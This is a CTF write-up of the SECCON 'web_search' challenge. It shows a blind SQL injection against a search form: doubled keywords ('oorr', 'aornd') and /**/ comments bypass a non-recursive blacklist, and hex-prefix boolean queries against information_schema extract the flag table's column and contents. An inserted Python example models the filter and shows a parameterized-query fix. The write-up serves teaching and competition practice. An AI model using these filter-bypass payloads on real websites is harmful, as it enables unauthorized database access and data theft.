Tags: web blind-sql-injection
Rating:
# ▼▼▼web_search(Web:212, 93/799=11.6%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
Get a hidden message! Let's find a hidden message using the search system on the site.
http://web-search.chal.seccon.jp/
```
---
# 【Information gathering】
`http://web-search.chal.seccon.jp/`
↓ Accessing the URL returns:
```
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Articles</title>
</head>
<body>
<form action="./" method="get">
<input type="text" name="q" value=""><input type="submit" value="Search">
</form>
<dl><dt>RFC 748</dt><dd>TELNET RANDOMLY-LOSE Option</dd><dt>RFC 1097</dt><dd>TELNET SUBLIMINAL-MESSAGE option</dd><dt>RFC 1149</dt><dd>Standard for the transmission of IP datagrams on Avian Carriers</dd><dt>RFC 1216</dt><dd>Gigabit Network Economics and Paradigm Shifts</dd><dt>RFC 1217</dt><dd>Memo from the Consortium for Slow Commotion Research (CSCR)</dd><dt>RFC 1313</dt><dd>Today's Programming for KRFC AM 1313 Internet Talk Radio</dd><dt>RFC 1437</dt><dd>The Extension of MIME Content-Types to a New Medium</dd><dt>RFC 1438</dt><dd>Internet Engineering Task Force Statements Of Boredom (SOBs)</dd><dt>RFC 1605</dt><dd>SONET to Sonnet Translation</dd><dt>RFC 1606</dt><dd>A Historical Perspective On The Usage Of IP Version 9</dd><dt>RFC 1607</dt><dd>A view from the 21st Century</dd><dt>RFC 1776</dt><dd>The Address is the Message</dd><dt>RFC 1924</dt><dd>A Compact Representation of IPv6 Addresses</dd><dt>RFC 1925</dt><dd>The Twelve Networking Truths</dd><dt>RFC 1926</dt><dd>An Experimental Encapsulation of IP Datagrams on Top of ATM</dd><dt>RFC 1927</dt><dd>Suggested Additional MIME Types for Associating Documents</dd><dt>RFC 2100</dt><dd>The Naming of Hosts</dd><dt>RFC 2321</dt><dd>RITA -- The Reliable Internetwork Troubleshooting Agent</dd><dt>RFC 2322</dt><dd>Management of IP numbers by peg-dhcp</dd><dt>RFC 2323</dt><dd>IETF Identification and Security Guidelines</dd><dt>RFC 2324</dt><dd>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)</dd><dt>RFC 2325</dt><dd>Definitions of Managed Objects for Drip-Type Heated Beverage Hardware Devices using SMIv2</dd><dt>RFC 2549</dt><dd>IP over Avian Carriers with Quality of Service</dd><dt>RFC 2550</dt><dd>Y10K and Beyond</dd><dt>RFC 2551</dt><dd>The Roman Standards Process -- Revision III</dd><dt>RFC 2795</dt><dd>The Infinite Monkey Protocol Suite (IMPS)</dd><dt>RFC 3091</dt><dd>Pi Digit Generation Protocol</dd><dt>RFC 3092</dt><dd>Etymology of "Foo"</dd><dt>RFC 3093</dt><dd>Firewall Enhancement Protocol (FEP)</dd><dt>RFC 
3251</dt><dd>Electricity over IP</dd><dt>RFC 3252</dt><dd>Binary Lexical Octet Ad-hoc Transport</dd><dt>RFC 3514</dt><dd>The Security Flag in the IPv4 Header (Evil Bit)</dd><dt>RFC 3751</dt><dd>Omniscience Protocol Requirement</dd><dt>RFC 4041</dt><dd>Requirements for Morality Sections in Routing Area Drafts</dd><dt>RFC 4042</dt><dd>UTF-9 and UTF-18 Efficient Transformation Formats of Unicode</dd><dt>RFC 4824</dt><dd>The Transmission of IP Datagrams over the Semaphore Flag Signaling System (SFSS)</dd><dt>RFC 5241</dt><dd>Naming Rights in IETF Protocols</dd><dt>RFC 5242</dt><dd>A Generalized Unified Character Code: Western European and CJK Sections</dd><dt>RFC 5513</dt><dd>IANA Considerations for Three Letter Acronyms</dd><dt>RFC 5514</dt><dd>IPv6 over Social Networks</dd><dt>RFC 5841</dt><dd>TCP Option to Denote Packet Mood</dd><dt>RFC 5984</dt><dd>Increasing Throughput in IP Networks with ESP-Based Forwarding: ESPBasedForwarding</dd><dt>RFC 6214</dt><dd>Adaptation of RFC 1149 for IPv6</dd><dt>RFC 6217</dt><dd>Regional Broadcast Using an Atmospheric Link Layer</dd><dt>RFC 6592</dt><dd>The Null Packet</dd><dt>RFC 6593</dt><dd>Service Undiscovery Using Hide-and-Go-Seek for the Domain Pseudonym System (DPS)</dd><dt>RFC 6919</dt><dd>Further Key Words for Use in RFCs to Indicate Requirement Levels</dd><dt>RFC 6921</dt><dd>Design Considerations for Faster-Than-Light (FTL) Communication</dd><dt>RFC 7168</dt><dd>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA)</dd><dt>RFC 7169</dt><dd>The NSA (No Secrecy Afforded) Certificate Extension</dd></dl>
Prev
/
Next
</body>
</html>
```
---
The input value is reflected in the form, but part of it has been removed
↓
`GET /?q='or''='` ⇒ `<input type="text" name="q" value="'''='"><input type="submit" value="Search">`
↓
`or` has been deleted!!
---
## 【1.Investigate what else has been removed】
`or`, `and`, space, `!`, `%` and `|` are deleted!!
The deletion is not applied recursively.
↓
For example, to use `or`, write `oorr`: the filter removes the inner `or` once and what remains is `or`
---
`GET /?q='oorr''=''%23`
↓
```
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Articles</title>
</head>
<body>
<form action="./" method="get">
<input type="text" name="q" value="'or''=''#"><input type="submit" value="Search">
</form>
<dl><dt>RFC 748</dt><dd>TELNET RANDOMLY-LOSE Option</dd><dt>RFC 1097</dt><dd>TELNET SUBLIMINAL-MESSAGE option</dd><dt>RFC 1149</dt><dd>Standard for the transmission of IP datagrams on Avian Carriers</dd><dt>RFC 1216</dt><dd>Gigabit Network Economics and Paradigm Shifts</dd><dt>RFC 1217</dt><dd>Memo from the Consortium for Slow Commotion Research (CSCR)</dd><dt>RFC 1313</dt><dd>Today's Programming for KRFC AM 1313 Internet Talk Radio</dd><dt>RFC 1437</dt><dd>The Extension of MIME Content-Types to a New Medium</dd><dt>RFC 1438</dt><dd>Internet Engineering Task Force Statements Of Boredom (SOBs)</dd><dt>RFC 1605</dt><dd>SONET to Sonnet Translation</dd><dt>RFC 1606</dt><dd>A Historical Perspective On The Usage Of IP Version 9</dd><dt>RFC 1607</dt><dd>A view from the 21st Century</dd><dt>RFC 1776</dt><dd>The Address is the Message</dd><dt>RFC 1924</dt><dd>A Compact Representation of IPv6 Addresses</dd><dt>RFC 1925</dt><dd>The Twelve Networking Truths</dd><dt>RFC 1926</dt><dd>An Experimental Encapsulation of IP Datagrams on Top of ATM</dd><dt>RFC 1927</dt><dd>Suggested Additional MIME Types for Associating Documents</dd><dt>RFC 2100</dt><dd>The Naming of Hosts</dd><dt>RFC 2321</dt><dd>RITA -- The Reliable Internetwork Troubleshooting Agent</dd><dt>RFC 2322</dt><dd>Management of IP numbers by peg-dhcp</dd><dt>RFC 2323</dt><dd>IETF Identification and Security Guidelines</dd><dt>RFC 2324</dt><dd>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)</dd><dt>RFC 2325</dt><dd>Definitions of Managed Objects for Drip-Type Heated Beverage Hardware Devices using SMIv2</dd><dt>RFC 2549</dt><dd>IP over Avian Carriers with Quality of Service</dd><dt>RFC 2550</dt><dd>Y10K and Beyond</dd><dt>RFC 2551</dt><dd>The Roman Standards Process -- Revision III</dd><dt>RFC 2795</dt><dd>The Infinite Monkey Protocol Suite (IMPS)</dd><dt>RFC 3091</dt><dd>Pi Digit Generation Protocol</dd><dt>RFC 3092</dt><dd>Etymology of "Foo"</dd><dt>RFC 3093</dt><dd>Firewall Enhancement Protocol (FEP)</dd><dt>RFC 
3251</dt><dd>Electricity over IP</dd><dt>RFC 3252</dt><dd>Binary Lexical Octet Ad-hoc Transport</dd><dt>RFC 3514</dt><dd>The Security Flag in the IPv4 Header (Evil Bit)</dd><dt>RFC 3751</dt><dd>Omniscience Protocol Requirement</dd><dt>RFC 4041</dt><dd>Requirements for Morality Sections in Routing Area Drafts</dd><dt>RFC 4042</dt><dd>UTF-9 and UTF-18 Efficient Transformation Formats of Unicode</dd><dt>RFC 4824</dt><dd>The Transmission of IP Datagrams over the Semaphore Flag Signaling System (SFSS)</dd><dt>RFC 5241</dt><dd>Naming Rights in IETF Protocols</dd><dt>RFC 5242</dt><dd>A Generalized Unified Character Code: Western European and CJK Sections</dd><dt>RFC 5513</dt><dd>IANA Considerations for Three Letter Acronyms</dd><dt>RFC 5514</dt><dd>IPv6 over Social Networks</dd><dt>RFC 5841</dt><dd>TCP Option to Denote Packet Mood</dd><dt>RFC 5984</dt><dd>Increasing Throughput in IP Networks with ESP-Based Forwarding: ESPBasedForwarding</dd><dt>RFC 6214</dt><dd>Adaptation of RFC 1149 for IPv6</dd><dt>RFC 6217</dt><dd>Regional Broadcast Using an Atmospheric Link Layer</dd><dt>RFC 6592</dt><dd>The Null Packet</dd><dt>RFC 6593</dt><dd>Service Undiscovery Using Hide-and-Go-Seek for the Domain Pseudonym System (DPS)</dd><dt>RFC 6919</dt><dd>Further Key Words for Use in RFCs to Indicate Requirement Levels</dd><dt>RFC 6921</dt><dd>Design Considerations for Faster-Than-Light (FTL) Communication</dd><dt>RFC 7168</dt><dd>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA)</dd><dt>RFC 7169</dt><dd>The NSA (No Secrecy Afforded) Certificate Extension</dd><dt>RFC 7511</dt><dd>Scenic Routing for IPv6</dd><dt>RFC 7514</dt><dd>Really Explicit Congestion Notification (RECN)</dd><dt>RFC 8135</dt><dd>Complex Addressing in IPv6</dd><dt>RFC 8136</dt><dd>Additional Transition Functionality for IPv6</dd><dt>RFC 8140</dt><dd>The Arte of ASCII: Or, An True and Accurate Representation of an Menagerie of Thynges Fabulous and Wonderful in Ye Forme of 
Character</dd><dt>RFC 8367</dt><dd>Wrongful Termination of Internet Protocol (IP) Packets</dd><dt>RFC 8369</dt><dd>Internationalizing IPv6 Using 128-Bit Unicode</dd><dt>RFC 8565</dt><dd>Hypertext Jeopardy Protocol (HTJP/1.0)</dd><dt>RFC 8567</dt><dd>Customer Management DNS Resource Records</dd><dt>FLAG</dt><dd>The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more!</dd></dl>
Prev
/
Next
</body>
</html>
```
↓
`<dd>The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more!</dd>`
This also confirms a `SQL injection` vulnerability: the quote closes the string literal and `#` comments out the rest of the query.
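To see why the single-pass blacklist above is bypassable and what the fix looks like, here is an added example (not code from the original writeup or the challenge). It assumes the filter is one left-to-right pass over the blocked tokens and that the server pastes the filtered input into a `LIKE '%...%'` query; both are assumptions, since the server code is not shown. `hex_to_text` decodes the hex prefixes compared against `hex(column_name)` and `hex(piece)` in the following steps, and `safe_search` shows the same input handled as data by a bound parameter.

```python
import re
import sqlite3

# Assumed model of the challenge's filter (the server code is not shown):
# a single left-to-right pass that drops each blocked token once, which is
# why "oorr" survives as "or" and "aornd" / "anandd" survive as "and".
BLOCKED = re.compile(r"or|and|!|%|\||\s")


def strip_keywords(q: str) -> str:
    """Return q with the blocked tokens removed exactly once (non-recursive)."""
    return BLOCKED.sub("", q)


def vulnerable_sql(q: str) -> str:
    """Assumed shape of the challenge's query: the filtered input is pasted
    straight into the SQL text, so a single quote still breaks out of the literal."""
    return "SELECT title, body FROM articles WHERE body LIKE '%" + strip_keywords(q) + "%'"


def safe_search(conn: sqlite3.Connection, q: str) -> list:
    """Hardened form: a bound parameter carries q as data, so no keyword
    blacklist is needed and 'or', quotes and comments are just characters."""
    cur = conn.execute("SELECT title FROM articles WHERE body LIKE ?", ("%" + q + "%",))
    return [row[0] for row in cur.fetchall()]


def hex_to_text(h: str) -> str:
    """Decode the hex prefixes the writeup compares with hex(column_name) and hex(piece)."""
    return bytes.fromhex(h).decode("ascii")


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table with two of the RFC titles from the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [("RFC 1149", "Standard for the transmission of IP datagrams on Avian Carriers"),
         ("RFC 2324", "Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)")],
    )
    return conn


if __name__ == "__main__":
    print(strip_keywords("'oorr''=''#"))            # 'or''=''#  (filter bypassed)
    print(vulnerable_sql("'oorr''=''#"))            # the quote closes the literal, # comments the rest
    print(safe_search(demo_db(), "'oorr''=''#"))    # []  (treated as plain text)
    print(hex_to_text("7069656365"))                # piece
```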
---
## 【2.Get number of columns in flag table】
Write `information_schema.columns` as `infoorrmation_schema.columns`, because `or` is deleted.
Write `and` as `anandd`, because `and` is deleted (`aornd` survives as `and` in the same way and is used below).
↓
`GET /?q='/**/anandd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/anandd/**/table_name='flag')=1/**/%23`
↓
`Content-Length: 4746`
↓
The response length is the true/false oracle; here it matches the true case, so there is one column.
---
## 【3.Get column name of flag table】
```
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='70')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='7069')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='706965')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='70696563')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='7069656365')=1/**/%23
```
↓
`7069656365`
↓
The column name is `piece`
---
## 【4.Get "piece" column of flag table】
```
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='59')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f75')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f5769')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f59')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f5965')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f596561')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f59656168')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f596561687d')=1/**/%23
```
↓
`596f755f57696e5f596561687d`
↓
`You_Win_Yeah}`
↓
`SECCON{Yeah_Sqli_Success_You_Win_Yeah}`